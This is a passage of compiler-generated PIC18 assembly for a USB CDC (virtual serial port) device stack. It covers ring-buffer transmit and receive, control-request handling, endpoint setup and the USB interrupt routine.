; } usb_configure_endpoints function end
ORG 0x000003EE
usb_cdc_ha_00095
; { usb_cdc_handle_tx ; function begin
MOVLW HIGH(gbl_bd3in+D'0')
MOVLB 0x02
MOVWF usb_cdc_ha_00095_1_bd+D'1', 1
MOVLW LOW(gbl_bd3in+D'0')
MOVWF usb_cdc_ha_00095_1_bd, 1
MOVF usb_cdc_ha_00095_1_bd+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
BTFSC INDF0,7
RETURN
MOVLB 0x01
MOVF gbl_ep_in_buffer_size+D'6', W, 1
MOVLB 0x02
MOVWF usb_cdc_ha_00095_1_buffer_size, 1
MOVLB 0x01
MOVF gbl_ep_in_buffer_size+D'7', W, 1
MOVLB 0x02
MOVWF usb_cdc_ha_00095_1_buffer_size+D'1', 1
MOVLB 0x01
MOVF gbl_ep_in_buffer_location+D'6', W, 1
MOVLB 0x02
MOVWF usb_cdc_ha_00095_1_buffer, 1
MOVLB 0x01
MOVF gbl_ep_in_buffer_location+D'7', W, 1
MOVLB 0x02
MOVWF usb_cdc_ha_00095_1_buffer+D'1', 1
MOVF gbl_cdc_tx_start, W, 1
CPFSEQ gbl_cdc_tx_end, 1
BRA label37
RETURN
label37
BCF usb_cdc_ha_00095_1_store_gie,0, 1
BTFSC gbl_intcon,7
BSF usb_cdc_ha_00095_1_store_gie,0, 1
label38
BCF gbl_intcon,7
BTFSC gbl_intcon,7
BRA label38
CLRF usb_cdc_ha_00095_1_count, 1
label39
MOVF gbl_cdc_tx_start, W, 1
CPFSEQ gbl_cdc_tx_end, 1
CPFSEQ gbl_cdc_tx_start, 1
BRA label41
MOVF usb_cdc_ha_00095_1_buffer_size, W, 1
CPFSLT usb_cdc_ha_00095_1_count, 1
MOVF usb_cdc_ha_00095_1_buffer_size+D'1', W, 1
BZ label41
INCF gbl_cdc_tx_start, W, 1
MOVWF usb_cdc_ha_00095_1_cdc_tx_next, 1
MOVLW 0x40
CPFSEQ usb_cdc_ha_00095_1_cdc_tx_next, 1
BRA label40
CLRF usb_cdc_ha_00095_1_cdc_tx_next, 1
label40
MOVLB 0x00
LFSR 0x00, gbl_cdc_tx_buffer
MOVF FSR0L, W
MOVLB 0x02
MOVF gbl_cdc_tx_start, W, 1
MOVWF CompTempVar2789, 1
MOVF CompTempVar2789, W, 1
ADDWF FSR0L, F
MOVF INDF0, W
MOVWF CompTempVar2790, 1
MOVF usb_cdc_ha_00095_1_buffer+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_ha_00095_1_buffer, W, 1
ADDWF usb_cdc_ha_00095_1_count, W, 1
MOVWF FSR0L
MOVF CompTempVar2790, W, 1
MOVWF INDF0
INCF usb_cdc_ha_00095_1_count, F, 1
MOVF usb_cdc_ha_00095_1_cdc_tx_next, W, 1
MOVWF gbl_cdc_tx_start, 1
BRA label39
label41
MOVLW 0x00
CPFSGT usb_cdc_ha_00095_1_count, 1
BRA label44
MOVF usb_cdc_ha_00095_1_bd+D'1', W, 1
MOVWF FSR0H
INCF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
MOVF usb_cdc_ha_00095_1_count, W, 1
MOVWF INDF0
DECF FSR0L, F
MOVLW 0x02
ADDWF FSR0L, F
INCF FSR0L, F
MOVF usb_cdc_ha_00095_1_buffer, W, 1
MOVWF CompTempVar2791, 1
MOVF usb_cdc_ha_00095_1_buffer+D'1', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2791, W, 1
MOVWF INDF0
MOVF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
BTFSS INDF0,6
BRA label42
MOVF usb_cdc_ha_00095_1_bd+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
BCF INDF0,6
BRA label43
label42
MOVF usb_cdc_ha_00095_1_bd+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
BSF INDF0,6
label43
MOVF usb_cdc_ha_00095_1_bd+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_ha_00095_1_bd, W, 1
MOVWF FSR0L
BCF INDF0,5
BCF INDF0,4
BSF INDF0,3
BCF INDF0,2
BCF INDF0,1
BCF INDF0,0
BSF INDF0,7
label44
BTFSC usb_cdc_ha_00095_1_store_gie,0, 1
BSF gbl_intcon,7
BTFSS usb_cdc_ha_00095_1_store_gie,0, 1
BCF gbl_intcon,7
RETURN
; } usb_cdc_handle_tx function end
ORG 0x000004E8
memcpy8_00000
; { memcpy8 ; function begin
MOVF memcpy8_00000_arg_dst, W, 1
MOVWF memcpy8_00000_1_dst2, 1
MOVF memcpy8_00000_arg_dst+D'1', W, 1
MOVWF memcpy8_00000_1_dst2+D'1', 1
MOVF memcpy8_00000_arg_src, W, 1
MOVWF memcpy8_00000_1_src2, 1
MOVF memcpy8_00000_arg_src+D'1', W, 1
MOVWF memcpy8_00000_1_src2+D'1', 1
label45
MOVLW 0x00
CPFSGT memcpy8_00000_arg_len, 1
BRA label46
MOVF memcpy8_00000_1_src2+D'1', W, 1
MOVWF FSR0H
MOVF memcpy8_00000_1_src2, W, 1
MOVWF FSR0L
INFSNZ memcpy8_00000_1_src2, F, 1
INCF memcpy8_00000_1_src2+D'1', F, 1
MOVF INDF0, W
MOVWF CompTempVar411, 1
MOVF memcpy8_00000_1_dst2+D'1', W, 1
MOVWF FSR0H
MOVF memcpy8_00000_1_dst2, W, 1
MOVWF FSR0L
INFSNZ memcpy8_00000_1_dst2, F, 1
INCF memcpy8_00000_1_dst2+D'1', F, 1
MOVF CompTempVar411, W, 1
MOVWF INDF0
DECF memcpy8_00000_arg_len, F, 1
BRA label45
label46
MOVF memcpy8_00000_arg_dst, W, 1
MOVWF CompTempVarRet410, 1
MOVF memcpy8_00000_arg_dst+D'1', W, 1
MOVWF CompTempVarRet410+D'1', 1
RETURN
; } memcpy8 function end
ORG 0x0000052C
usb_prime__00099
; { usb_prime_ep0_out ; function begin
MOVLW 0x08
MOVLB 0x02
MOVWF gbl_bd0out+D'1', 1
MOVLW 0x80
MOVWF gbl_bd0out+D'2', 1
MOVLW 0x02
MOVWF gbl_bd0out+D'3', 1
BSF gbl_bd0out,6, 1
BCF gbl_bd0out,5, 1
BCF gbl_bd0out,4, 1
BSF gbl_bd0out,3, 1
BCF gbl_bd0out,2, 1
BCF gbl_bd0out,1, 1
BCF gbl_bd0out,0, 1
BSF gbl_bd0out,7, 1
RETURN
; } usb_prime_ep0_out function end
ORG 0x0000054C
usb_handle_0009A
; { usb_handle_standard_request ; function begin
MOVLW 0x06
CPFSEQ usb_handle_0009A_arg_sdp+D'1', 1
BRA label47
BRA label51
label47
MOVLW 0x05
CPFSEQ usb_handle_0009A_arg_sdp+D'1', 1
BRA label48
BRA label54
label48
MOVLW 0x09
CPFSEQ usb_handle_0009A_arg_sdp+D'1', 1
BRA label49
BRA label56
label49
MOVLW 0x0A
CPFSEQ usb_handle_0009A_arg_sdp+D'1', 1
BRA label50
BRA label58
label50
MOVF usb_handle_0009A_arg_sdp+D'1', F, 1
BZ label60
BRA label62
label51
MOVF usb_handle_0009A_arg_sdp+D'3', W, 1
MOVWF usb_handle_0009A_1_descrip_0009B, 1
MOVF usb_handle_0009A_arg_sdp+D'2', W, 1
MOVWF usb_handle_0009A_1_descrip_0009C, 1
MOVF usb_handle_0009A_1_descrip_0009B, W, 1
MOVWF usb_get_de_0008C_arg_descr_0008D, 1
MOVF usb_handle_0009A_1_descrip_0009C, W, 1
MOVWF usb_get_de_0008C_arg_descr_0008E, 1
MOVLW HIGH(gbl_delivery_ptr+D'0')
MOVWF usb_get_de_0008C_arg_rtn_d_0008F+D'1', 1
MOVLW LOW(gbl_delivery_ptr+D'0')
MOVWF usb_get_de_0008C_arg_rtn_d_0008F, 1
MOVLW HIGH(gbl_delivery_bytes_to_send+D'0')
MOVWF usb_get_de_0008C_arg_rtn_d_00090+D'1', 1
MOVLW LOW(gbl_delivery_bytes_to_send+D'0')
MOVWF usb_get_de_0008C_arg_rtn_d_00090, 1
CALL usb_get_de_0008C
MOVF gbl_delivery_ptr, F, 1
BNZ label52
MOVF gbl_delivery_ptr+D'1', F, 1
BZ label53
label52
MOVLW 0x03
MOVWF gbl_control_mode, 1
MOVF usb_handle_0009A_arg_sdp+D'6', W, 1
MOVWF gbl_delivery_bytes_max_send, 1
MOVF usb_handle_0009A_arg_sdp+D'7', W, 1
MOVWF gbl_delivery_bytes_max_send+D'1', 1
CLRF gbl_delivery_bytes_sent, 1
CLRF gbl_delivery_bytes_sent+D'1', 1
MOVLW 0x08
MOVWF gbl_delivery_buffer_size, 1
MOVLW 0x88
MOVWF gbl_delivery_buffer, 1
MOVLW 0x02
MOVWF gbl_delivery_buffer+D'1', 1
BCF gbl_bd0in,6, 1
CALL usb_send_d_00086
BRA label63
label53
CALL usb_stall__00087
BRA label63
label54
MOVF usb_handle_0009A_arg_sdp+D'2', W, 1
MOVWF gbl_usb_address, 1
MOVLW 0x01
MOVWF gbl_usb_status, 1
MOVLW 0x08
GOTO usb_send_e_00085
label55
MOVLW 0x06
MOVWF gbl_control_mode, 1
BRA label63
label56
MOVLW 0x06
MOVWF gbl_control_mode, 1
MOVLW 0x0C
GOTO usb_send_e_00085
label57
MOVLW 0x03
MOVWF gbl_usb_state, 1
CALL usb_config_00097
CALL usb_device_00096
BRA label63
label58
MOVLW 0x03
MOVWF gbl_control_mode, 1
MOVLW 0x01
MOVWF usb_send_o_00098_arg_data, 1
MOVLW 0x00
GOTO usb_send_o_00098
label59
BRA label63
label60
CLRF usb_send_o_00098_arg_data, 1
MOVLW 0x04
GOTO usb_send_o_00098
label61
BRA label63
label62
CALL usb_stall__00087
label63
GOTO label77
; } usb_handle_standard_request function end
ORG 0x00000616
usb_handle_0008B
; { usb_handle_class_request ; function begin
MOVLW 0x20
CPFSEQ usb_handle_0008B_arg_sdp+D'1', 1
BRA label64
BRA label66
label64
MOVLW 0x21
CPFSEQ usb_handle_0008B_arg_sdp+D'1', 1
BRA label65
BRA label67
label65
MOVLW 0x22
CPFSEQ usb_handle_0008B_arg_sdp+D'1', 1
BRA label69
BRA label68
label66
MOVLW 0x02
MOVWF gbl_control_mode, 1
BRA label69
label67
MOVLW 0x04
MOVWF gbl_control_mode, 1
CLRF usb_send_d_00084_arg_ep, 1
MOVLW HIGH(gbl_class_data+D'0')
MOVWF usb_send_d_00084_arg_data+D'1', 1
MOVLW LOW(gbl_class_data+D'0')
MOVWF usb_send_d_00084_arg_data, 1
MOVLW 0x08
MOVWF usb_send_d_00084_arg_send_count, 1
BSF usb_send_d_00084_arg_first,0, 1
CALL usb_send_d_00084
BRA label69
label68
MOVLW 0x06
MOVWF gbl_control_mode, 1
MOVLW 0x04
GOTO usb_send_e_00085
label69
GOTO label79
; } usb_handle_class_request function end
ORG 0x0000065C
usb_handle_0008A
; { usb_handle_ctrl_write_class ; function begin
MOVLW 0x20
MOVLB 0x01
CPFSEQ gbl_usb_sdp+D'1', 1
BRA label71
MOVLW HIGH(gbl_class_data+D'0')
MOVLB 0x02
MOVWF memcpy8_00000_arg_dst+D'1', 1
MOVLW LOW(gbl_class_data+D'0')
MOVWF memcpy8_00000_arg_dst, 1
MOVF usb_handle_0008A_arg_data, W, 1
MOVWF memcpy8_00000_arg_src, 1
MOVF usb_handle_0008A_arg_data+D'1', W, 1
MOVWF memcpy8_00000_arg_src+D'1', 1
MOVF usb_handle_0008A_arg_count, W, 1
MOVWF memcpy8_00000_arg_len, 1
CALL memcpy8_00000
MOVLW 0x06
MOVWF gbl_control_mode, 1
MOVLW 0x00
GOTO usb_send_e_00085
label70
MOVLW HIGH(gbl_class_data+D'0')
MOVWF usb_handle_0008A_1_my_lc+D'1', 1
MOVLW LOW(gbl_class_data+D'0')
MOVWF usb_handle_0008A_1_my_lc, 1
label71
GOTO label89
; } usb_handle_ctrl_write_class function end
ORG 0x00000694
usb_handle_00089
; { usb_handle_ctrl_read_class ; function begin
MOVLW 0x21
MOVLB 0x01
CPFSEQ gbl_usb_sdp+D'1', 1
RETURN
MOVLW 0x05
MOVLB 0x02
MOVWF gbl_control_mode, 1
RETURN
; } usb_handle_ctrl_read_class function end
ORG 0x000006A4
usb_ep_dat_00094
; { usb_ep_data_in_callback ; function begin
CALL usb_cdc_ha_00095
GOTO label100
; } usb_ep_data_in_callback function end
ORG 0x000006AC
usb_ep_dat_00093
; { usb_ep_data_out_callback ; function begin
MOVLW 0x03
CPFSEQ usb_ep_dat_00093_arg_end_point, 1
RETURN
CLRF usb_ep_dat_00093_2_count, 1
label72
MOVF usb_ep_dat_00093_arg_byte_count, W, 1
CPFSLT usb_ep_dat_00093_2_count, 1
MOVF usb_ep_dat_00093_arg_byte_count+D'1', W, 1
BTFSC STATUS,Z
RETURN
INCF gbl_cdc_rx_end, W, 1
MOVWF usb_ep_dat_00093_1_cdc_rx_next, 1
MOVLW 0x40
CPFSEQ usb_ep_dat_00093_1_cdc_rx_next, 1
BRA label73
CLRF usb_ep_dat_00093_1_cdc_rx_next, 1
label73
MOVF gbl_cdc_rx_start, W, 1
CPFSEQ usb_ep_dat_00093_1_cdc_rx_next, 1
CPFSEQ gbl_cdc_rx_start, 1
BRA label74
MOVF usb_ep_dat_00093_arg_buffer+D'1', W, 1
MOVWF FSR0H
MOVF usb_ep_dat_00093_arg_buffer, W, 1
MOVWF FSR0L
MOVF usb_ep_dat_00093_2_count, W, 1
MOVWF CompTempVar2782, 1
MOVF CompTempVar2782, W, 1
ADDWF FSR0L, F
MOVF INDF0, W
MOVWF CompTempVar2783, 1
MOVLB 0x00
LFSR 0x00, gbl_cdc_rx_buffer
MOVF FSR0L, W
MOVLB 0x02
MOVF gbl_cdc_rx_end, W, 1
ADDWF FSR0L, F
MOVF CompTempVar2783, W, 1
MOVWF INDF0
MOVF usb_ep_dat_00093_1_cdc_rx_next, W, 1
MOVWF gbl_cdc_rx_end, 1
label74
INCF usb_ep_dat_00093_2_count, F, 1
BRA label72
; } usb_ep_data_out_callback function end
ORG 0x00000700
usb_handle_00081
; { usb_handle_stall ; function begin
RETURN
; } usb_handle_stall function end
ORG 0x00000702
usb_handle_00080
; { usb_handle_reset ; function begin
MOVLB 0x02
CLRF gbl_usb_address, 1
CLRF gbl_control_mode, 1
CLRF gbl_usb_status, 1
BCF gbl_uir,3
BCF gbl_uir,3
BCF gbl_uir,3
BCF gbl_uir,3
MOVLW 0x08
MOVWF gbl_bd0out+D'1', 1
MOVLW 0x80
MOVWF gbl_bd0out+D'2', 1
MOVLW 0x02
MOVWF gbl_bd0out+D'3', 1
BCF gbl_bd0out,6, 1
BCF gbl_bd0out,5, 1
BCF gbl_bd0out,4, 1
BCF gbl_bd0out,3, 1
BCF gbl_bd0out,2, 1
BCF gbl_bd0out,1, 1
BCF gbl_bd0out,0, 1
BSF gbl_bd0out,7, 1
MOVLW 0x08
MOVWF gbl_bd0in+D'1', 1
MOVLW 0x88
MOVWF gbl_bd0in+D'2', 1
MOVLW 0x02
MOVWF gbl_bd0in+D'3', 1
BCF gbl_bd0in,6, 1
BCF gbl_bd0in,5, 1
BCF gbl_bd0in,4, 1
BCF gbl_bd0in,2, 1
BCF gbl_bd0in,1, 1
BCF gbl_bd0in,0, 1
BCF gbl_bd0in,7, 1
RETURN
; } usb_handle_reset function end
ORG 0x0000074A
usb_handle_0007F
; { usb_handle_transaction ; function begin
RRCF gbl_ustat, W
MOVLB 0x02
MOVWF usb_handle_0007F_1_end_point, 1
RRCF usb_handle_0007F_1_end_point, F, 1
RRCF usb_handle_0007F_1_end_point, F, 1
MOVLW 0x1F
ANDWF usb_handle_0007F_1_end_point, F, 1
BTFSS gbl_ustat,2
BRA label75
RRCF gbl_bd0in, W, 1
MOVWF usb_handle_0007F_1_pid, 1
RRCF usb_handle_0007F_1_pid, F, 1
MOVLW 0x3F
ANDWF usb_handle_0007F_1_pid, F, 1
MOVLW 0x0F
ANDWF usb_handle_0007F_1_pid, F, 1
BRA label76
label75
RRCF gbl_bd0out, W, 1
MOVWF CompTempVar2712, 1
RRCF CompTempVar2712, F, 1
MOVLW 0x3F
ANDWF CompTempVar2712, F, 1
MOVLW 0x0F
ANDWF CompTempVar2712, W, 1
MOVWF usb_handle_0007F_1_pid, 1
label76
MOVF usb_handle_0007F_1_end_point, F, 1
BTFSS STATUS,Z
BRA label92
MOVLW 0x0D
CPFSEQ usb_handle_0007F_1_pid, 1
BRA label80
MOVLW HIGH(gbl_usb_sdp+D'0')
MOVWF memcpy8_00000_arg_dst+D'1', 1
MOVLW LOW(gbl_usb_sdp+D'0')
MOVWF memcpy8_00000_arg_dst, 1
MOVLW HIGH(gbl_buffer_0_out+D'0')
MOVWF memcpy8_00000_arg_src+D'1', 1
MOVLW LOW(gbl_buffer_0_out+D'0')
MOVWF memcpy8_00000_arg_src, 1
MOVLW 0x08
MOVWF memcpy8_00000_arg_len, 1
CALL memcpy8_00000
CALL usb_prime__00099
MOVLW 0x40
MOVLB 0x01
ANDWF gbl_usb_sdp, W, 1
MOVLB 0x02
MOVWF CompTempVar2715, 1
TSTFSZ CompTempVar2715, 1
BRA label78
MOVLW 0x20
MOVLB 0x01
ANDWF gbl_usb_sdp, W, 1
MOVLB 0x02
MOVWF CompTempVar2716, 1
TSTFSZ CompTempVar2716, 1
BRA label78
MOVLB 0x01
MOVF gbl_usb_sdp+D'7', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'7', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'6', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'6', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'5', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'5', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'4', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'4', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'3', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'3', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'2', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'2', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'1', W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp+D'1', 1
MOVLB 0x01
MOVF gbl_usb_sdp, W, 1
MOVLB 0x02
MOVWF usb_handle_0009A_arg_sdp, 1
MOVLW 0x99
GOTO usb_handle_0009A
label77
BRA label79
label78
MOVLW 0x40
MOVLB 0x01
ANDWF gbl_usb_sdp, W, 1
MOVLB 0x02
MOVWF CompTempVar2718, 1
TSTFSZ CompTempVar2718, 1
BRA label79
MOVLB 0x01
BTFSS gbl_usb_sdp,5, 1
BRA label79
MOVF gbl_usb_sdp+D'7', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'7', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'6', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'6', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'5', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'5', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'4', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'4', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'3', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'3', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'2', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'2', 1
MOVLB 0x01
MOVF gbl_usb_sdp+D'1', W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp+D'1', 1
MOVLB 0x01
MOVF gbl_usb_sdp, W, 1
MOVLB 0x02
MOVWF usb_handle_0008B_arg_sdp, 1
MOVLW 0x99
GOTO usb_handle_0008B
label79
BCF gbl_ucon,4
BRA label108
label80
MOVLW 0x09
CPFSEQ usb_handle_0007F_1_pid, 1
BRA label84
MOVLW 0x03
CPFSEQ gbl_control_mode, 1
BRA label81
CALL usb_send_d_00086
BRA label108
label81
MOVLW 0x06
CPFSEQ gbl_control_mode, 1
BRA label82
CLRF gbl_control_mode, 1
DECF gbl_usb_status, W, 1
BTFSS STATUS,Z
BRA label108
MOVLW 0x02
MOVWF gbl_usb_state, 1
MOVF gbl_usb_address, W, 1
MOVLB 0x0F
MOVWF gbl_uaddr, 1
MOVLB 0x02
CLRF gbl_usb_status, 1
BRA label108
label82
MOVLW 0x05
CPFSEQ gbl_control_mode, 1
BRA label83
NOP
BRA label108
label83
MOVLW 0x04
CPFSEQ gbl_control_mode, 1
BRA label108
CALL usb_handle_00089
BRA label108
label84
MOVLW 0x02
CPFSEQ usb_handle_0007F_1_pid, 1
BRA label87
MOVLW 0x03
CPFSEQ gbl_control_mode, 1
BRA label85
CALL usb_send_d_00086
BRA label108
label85
MOVLW 0x04
CPFSEQ gbl_control_mode, 1
BRA label86
CALL usb_handle_00089
BRA label108
label86
MOVLW 0x06
CPFSEQ gbl_control_mode, 1
BRA label108
CLRF gbl_control_mode, 1
BRA label108
label87
DECF usb_handle_0007F_1_pid, W, 1
BTFSS STATUS,Z
BRA label108
MOVLW 0x05
CPFSEQ gbl_control_mode, 1
BRA label88
CLRF gbl_control_mode, 1
BRA label91
label88
MOVLW 0x02
CPFSEQ gbl_control_mode, 1
BRA label90
MOVLW HIGH(gbl_buffer_0_out+D'0')
MOVWF usb_handle_0008A_arg_data+D'1', 1
MOVLW LOW(gbl_buffer_0_out+D'0')
MOVWF usb_handle_0008A_arg_data, 1
MOVF gbl_bd0out+D'1', W, 1
MOVWF usb_handle_0008A_arg_count, 1
CLRF usb_handle_0008A_arg_count+D'1', 1
MOVLW 0x99
GOTO usb_handle_0008A
label89
BRA label91
label90
MOVLW 0x03
CPFSEQ gbl_control_mode, 1
BRA label91
CLRF gbl_control_mode, 1
label91
CALL usb_prime__00099
BRA label108
label92
BTFSS gbl_ustat,2
BRA label101
MOVF usb_handle_0007F_1_end_point, F, 1
BNZ label93
BRA label95
label93
DECF usb_handle_0007F_1_end_point, W, 1
BZ label96
MOVLW 0x02
CPFSEQ usb_handle_0007F_1_end_point, 1
BRA label94
BRA label97
label94
MOVLW 0x03
CPFSEQ usb_handle_0007F_1_end_point, 1
BRA label99
BRA label98
label95
MOVF gbl_bd0in+D'1', W, 1
MOVWF usb_handle_0007F_88_count, 1
BRA label99
label96
MOVF gbl_bd1in+D'1', W, 1
MOVWF usb_handle_0007F_88_count, 1
BRA label99
label97
MOVF gbl_bd2in+D'1', W, 1
MOVWF usb_handle_0007F_88_count, 1
BRA label99
label98
MOVF gbl_bd3in+D'1', W, 1
MOVWF usb_handle_0007F_88_count, 1
label99
MOVF usb_handle_0007F_1_end_point, W, 1
MOVWF usb_ep_dat_00094_arg_end_point, 1
MOVF usb_handle_0007F_88_count, W, 1
MOVWF usb_ep_dat_00094_arg_byte_count, 1
CLRF usb_ep_dat_00094_arg_byte_count+D'1', 1
MOVLW 0x99
GOTO usb_ep_dat_00094
label100
BRA label108
label101
MOVF usb_handle_0007F_1_end_point, F, 1
BZ label103
DECF usb_handle_0007F_1_end_point, W, 1
BZ label104
MOVLW 0x02
CPFSEQ usb_handle_0007F_1_end_point, 1
BRA label102
BRA label105
label102
MOVLW 0x03
CPFSEQ usb_handle_0007F_1_end_point, 1
BRA label107
BRA label106
label103
MOVLW HIGH(gbl_bd0out+D'0')
MOVWF usb_handle_0007F_97_bdstat+D'1', 1
MOVLW LOW(gbl_bd0out+D'0')
MOVWF usb_handle_0007F_97_bdstat, 1
MOVLW HIGH(gbl_bd0out+D'1')
MOVWF usb_handle_0007F_97_bdcount+D'1', 1
MOVLW LOW(gbl_bd0out+D'1')
MOVWF usb_handle_0007F_97_bdcount, 1
BRA label107
label104
MOVLW HIGH(gbl_bd1out+D'0')
MOVWF CompTempVar2724, 1
MOVLW LOW(gbl_bd1out+D'0')
MOVWF usb_handle_0007F_97_bdstat, 1
MOVF CompTempVar2724, W, 1
MOVWF usb_handle_0007F_97_bdstat+D'1', 1
MOVLW HIGH(gbl_bd1out+D'1')
MOVWF CompTempVar2725, 1
MOVLW LOW(gbl_bd1out+D'1')
MOVWF usb_handle_0007F_97_bdcount, 1
MOVF CompTempVar2725, W, 1
MOVWF usb_handle_0007F_97_bdcount+D'1', 1
BRA label107
label105
MOVLW HIGH(gbl_bd2out+D'0')
MOVWF CompTempVar2726, 1
MOVLW LOW(gbl_bd2out+D'0')
MOVWF usb_handle_0007F_97_bdstat, 1
MOVF CompTempVar2726, W, 1
MOVWF usb_handle_0007F_97_bdstat+D'1', 1
MOVLW HIGH(gbl_bd2out+D'1')
MOVWF CompTempVar2727, 1
MOVLW LOW(gbl_bd2out+D'1')
MOVWF usb_handle_0007F_97_bdcount, 1
MOVF CompTempVar2727, W, 1
MOVWF usb_handle_0007F_97_bdcount+D'1', 1
BRA label107
label106
MOVLW HIGH(gbl_bd3out+D'0')
MOVWF CompTempVar2728, 1
MOVLW LOW(gbl_bd3out+D'0')
MOVWF usb_handle_0007F_97_bdstat, 1
MOVF CompTempVar2728, W, 1
MOVWF usb_handle_0007F_97_bdstat+D'1', 1
MOVLW HIGH(gbl_bd3out+D'1')
MOVWF CompTempVar2729, 1
MOVLW LOW(gbl_bd3out+D'1')
MOVWF usb_handle_0007F_97_bdcount, 1
MOVF CompTempVar2729, W, 1
MOVWF usb_handle_0007F_97_bdcount+D'1', 1
label107
MOVF usb_handle_0007F_1_end_point, W, 1
MOVWF usb_ep_dat_00093_arg_end_point, 1
MOVLB 0x01
LFSR 0x00, gbl_ep_out_buffer_location
MOVF FSR0L, W
MOVLB 0x02
MOVF usb_handle_0007F_1_end_point, W, 1
MOVWF CompTempVar2736, 1
BCF STATUS,C
RLCF CompTempVar2736, W, 1
ADDWF FSR0L, F
MOVF POSTINC0, W
MOVWF usb_ep_dat_00093_arg_buffer, 1
MOVF INDF0, W
MOVWF usb_ep_dat_00093_arg_buffer+D'1', 1
MOVF usb_handle_0007F_97_bdcount+D'1', W, 1
MOVWF FSR0H
MOVF usb_handle_0007F_97_bdcount, W, 1
MOVWF FSR0L
MOVF INDF0, W
MOVWF usb_ep_dat_00093_arg_byte_count, 1
CLRF usb_ep_dat_00093_arg_byte_count+D'1', 1
CALL usb_ep_dat_00093
MOVLB 0x01
LFSR 0x00, gbl_ep_out_buffer_size
MOVF FSR0L, W
MOVLB 0x02
MOVF usb_handle_0007F_1_end_point, W, 1
MOVWF CompTempVar2739, 1
BCF STATUS,C
RLCF CompTempVar2739, F, 1
MOVF CompTempVar2739, W, 1
ADDWF FSR0L, F
MOVF POSTINC0, W
MOVWF CompTempVar2741, 1
MOVF INDF0, W
MOVWF CompTempVar2741+D'1', 1
MOVF usb_handle_0007F_97_bdcount+D'1', W, 1
MOVWF FSR0H
MOVF usb_handle_0007F_97_bdcount, W, 1
MOVWF FSR0L
MOVF CompTempVar2741, W, 1
MOVWF INDF0
MOVF usb_handle_0007F_97_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_handle_0007F_97_bdstat, W, 1
MOVWF FSR0L
BCF INDF0,6
BCF INDF0,5
BCF INDF0,4
BCF INDF0,3
BCF INDF0,2
BCF INDF0,1
BCF INDF0,0
BSF INDF0,7
label108
GOTO label110
; } usb_handle_transaction function end
ORG 0x00000A40
usb_SOF_ca_00082
; { usb_SOF_callback ; function begin
CALL usb_cdc_ha_00095
GOTO label114
; } usb_SOF_callback function end
ORG 0x00000A48
usb_handle_0007E
; { usb_handle_isr ; function begin
BTFSS gbl_pir2,2
BRA label115
BCF gbl_pir2,2
BTFSS gbl_uir,4
BRA label109
BCF gbl_uir,4
label109
BTFSS gbl_uir,3
BRA label111
MOVLW 0x99
GOTO usb_handle_0007F
label110
BCF gbl_uir,3
label111
BTFSS gbl_uir,0
BRA label112
CALL usb_handle_00080
BCF gbl_uir,0
label112
BTFSS gbl_uir,5
BRA label113
CALL usb_handle_00081
BCF gbl_uir,5
label113
BTFSS gbl_uir,6
BRA label115
MOVLB 0x0F
MOVF gbl_ufrml, W, 1
MOVLB 0x02
MOVWF usb_SOF_ca_00082_arg_frame, 1
CLRF usb_SOF_ca_00082_arg_frame+D'1', 1
MOVLW 0x99
GOTO usb_SOF_ca_00082
label114
BCF gbl_uir,6
label115
GOTO label163
; } usb_handle_isr function end
ORG 0x00000A8E
usb_setup_00000
; { usb_setup ; function begin
MOVLB 0x02
CLRF gbl_usb_state, 1
BCF gbl_ucfg,3
BSF gbl_ucfg,2
BSF gbl_ucfg,4
BCF gbl_ucfg,1
BCF gbl_ucfg,0
MOVLB 0x0F
BSF gbl_uep0,4, 1
BSF gbl_uep0,2, 1
BSF gbl_uep0,1, 1
BCF gbl_uep0,3, 1
BSF gbl_uie,5
BSF gbl_uie,3
BSF gbl_uie,0
BSF gbl_pie2,2
BSF gbl_uie,6
RETURN
; } usb_setup function end
ORG 0x00000AB2
usb_ep_get_000A2
; { usb_ep_get_rx_buffer ; function begin
MOVLW 0x40
CPFSGT usb_ep_get_000A2_arg_length, 1
BRA label116
MOVLW 0x40
MOVWF usb_ep_get_000A2_arg_length, 1
label116
CLRF usb_ep_get_000A2_1_count, 1
label117
MOVF usb_ep_get_000A2_arg_length, W, 1
CPFSLT usb_ep_get_000A2_1_count, 1
BRA label118
MOVLB 0x00
LFSR 0x00, gbl_cdc_rx_buffer
MOVF FSR0L, W
MOVLB 0x02
MOVF usb_ep_get_000A2_1_count, W, 1
